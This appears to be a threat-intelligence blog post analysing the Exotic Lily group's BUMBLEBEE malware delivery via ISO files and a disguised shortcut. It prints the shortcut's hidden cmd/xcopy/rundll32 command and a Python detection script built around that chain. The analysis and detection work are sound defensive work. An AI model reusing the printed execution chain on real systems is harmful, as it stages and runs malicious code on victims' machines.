In September 2021, Google TAG researchers discovered a financially motivated threat actor, Exotic Lily. The group was exploiting a zero-day in Microsoft’s MSHTML (CVE-2021-40444).
Exotic Lily is an initial access broker. Such actors specialize in breaching a company and then selling the access to the highest bidder; among the parties bidding for Exotic Lily’s access were the Conti and Diavol ransomware groups. To breach companies, Exotic Lily was observed running mass emailing/spoofing campaigns (5000+ emails per day) against more than 600 companies. The group shifted its focus from IT, healthcare, and cybersecurity companies to a broader spectrum of targets. Exotic Lily shows an unusual level of human interaction while running these campaigns. Based on the group’s working hours, it can be concluded that it operates from the Eastern/Central European region.
A few days ago, Google TAG researchers spotted ISO files being used as a malware delivery method. These were specifically crafted to deliver BazarLoader DLL files.
File transfer services such as OneDrive, TransferNow, and WeTransfer were used to send out these malicious ISO files as attachments in the mass email campaigns.
The malware is called BUMBLEBEE because it uses a unique user agent, “bumblebee”. BUMBLEBEE uses Windows Management Instrumentation (WMI) to collect system data and then exfiltrates it in JSON format. Once this is done, the malware waits for commands from the C2 server. The C2 server was also observed deploying a Cobalt Strike payload.
Exotic Lily used identity spoofing to register look-alike domains of legitimate businesses by replacing the TLD with “.us”, “.co”, or “.biz”. The attackers would then pose as real company employees, copying their details from sites such as LinkedIn, RocketReach, and Crunchbase.
The slide below shows the initial contact between the attackers and the victims.
Mounting the ISO file exposes two files.
At first glance the Attachments file looks like an ordinary shortcut; nothing wrong, huh?
Opening the shortcut’s properties panel reveals that the Target field contains a command:
C:\Windows\System32\cmd.exe /c xcopy /y DumpStack.log c:\programdata\ && C:\Windows\System32\rundll32.exe C:\programdata\DumpStack.log,spload && exit
cmd /c C:\Users\user\AppData\Local\Temp\Attachments.lnk
"C:\Windows\System32\cmd.exe" /c xcopy /y DumpStack.log c:\programdata\ && C:\Windows\System32\rundll32.exe C:\programdata\DumpStack.log,spload && exit
xcopy /y DumpStack.log c:\programdata\
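The process chain above (cmd launching the .lnk, xcopy staging DumpStack.log into ProgramData, rundll32 loading a non-.dll module) can be turned into detection logic over process-creation events. The following is an added example written for this post, not code from the original page; the Sysmon-style events, field names and detection names are constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (Sysmon event 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c C:\Users\user\AppData\Local\Temp\Attachments.lnk"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c xcopy /y DumpStack.log c:\programdata\ && '
                r"C:\Windows\System32\rundll32.exe C:\programdata\DumpStack.log,spload && exit"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"C:\Windows\System32\rundll32.exe C:\programdata\DumpStack.log,spload"},
    # Benign control: rundll32 loading a real DLL from System32
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

# Captures "<module path>,<export>" from a rundll32 invocation.
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",\s]+)"?\s*,\s*(\w+)', re.IGNORECASE)
WRITABLE_DIRS = ("c:\\programdata", "c:\\users\\")

def rundll32_module(cmdline):
    """Return (module_path, export) parsed from a rundll32 command line, or None."""
    m = RUNDLL_RE.search(cmdline)
    return (m.group(1), m.group(2)) if m else None

def classify(event):
    """Return the list of detection names triggered by one process-creation event."""
    hits = []
    cl = event["cmdline"]
    low = cl.lower()
    # 1: a shortcut launched through cmd /c
    if re.search(r"cmd(?:\.exe)?\s+/c\s+\S+\.lnk\b", cl, re.IGNORECASE):
        hits.append("lnk_launched_via_cmd")
    # 2: a one-liner that copies a payload into ProgramData and hands it to rundll32
    if "xcopy" in low and "rundll32" in low and "programdata" in low:
        hits.append("xcopy_then_rundll32")
    mod = rundll32_module(cl)
    if mod:
        path, _export = mod
        p = PureWindowsPath(path)
        # 3: rundll32 given a module whose extension is not .dll (here a .log masquerade)
        if p.suffix.lower() != ".dll":
            hits.append("rundll32_non_dll_module")
        # 4: module loaded from a user-writable location
        if str(p).lower().startswith(WRITABLE_DIRS):
            hits.append("rundll32_module_in_writable_dir")
    return hits

def scan(events=SAMPLE_EVENTS):
    """Return (cmdline, hits) for every event that triggers at least one detection."""
    results = []
    for e in events:
        hits = classify(e)
        if hits:
            results.append((e["cmdline"], hits))
    return results
```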
Compiler time stamp: Tue Jan 18 13:47:09 2022 UTC
DumpStack.log: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Exports of the PE file as listed by pestudio:
spload ------> the exported function that rundll32 invokes from DumpStack.log.
VerSprite’s Threat Intelligence Group provides organizations with real-time threat monitoring, analysis, prevention recommendations, and mitigation. Our elite team works with companies across all industries and security maturity levels to defend against threats. For more information on VerSprite’s Threat Intel Group or our botnet detection service, BreachSeeker, contact one of our security advisers today.